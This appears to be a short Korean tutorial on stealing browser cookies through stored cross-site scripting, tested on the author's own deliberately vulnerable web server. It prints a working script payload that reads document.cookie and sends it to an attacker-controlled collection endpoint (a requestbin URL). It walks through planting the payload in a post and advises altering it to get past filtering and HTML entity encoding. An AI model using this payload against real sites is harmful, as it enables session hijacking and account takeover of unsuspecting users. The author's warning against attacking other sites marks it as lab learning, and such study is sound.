쿠키탈취를 위한 준비물

1. 공격자 서버

공격자 서버는
https://public.requestbin.com/r/ 을 이용했다.

Copy 해서 공격자 서버부분에 넣고 피해자가 악성스크립트가 삽입된 게시물을 클릭하거나 링크를 누르면 해당 사이트로 쿠키가 넘어온다.

2. 쿠키탈취코드

<script> 
var cookieData =document.cookie;
var i =new Image();
i.src = `공격자 서버 ?cookie=${cookieData}`;
</script>

필터링,HTML Entity, 삽입위치 등 상황에 맞게 변형하여 사용하면 된다.

3. 공격할 웹서버

나는 내가 만든 웹서버를 사용하였다. (아무 사이트나 공격하면 안됩니다!)
필터링이나 Html Entity 를 사용하지 않아 매우 취약한 웹서버이다.

쿠키 탈취

1. 취약한 곳을 찾아 쿠키 탈취코드를 이용하여 게시글을 작성한다.

2. 작성한 게시글을 클릭한다.


의도한 악성 스크립트가 그대로 실행되는 것을 확인.

3. 쿠키 탈취 완료!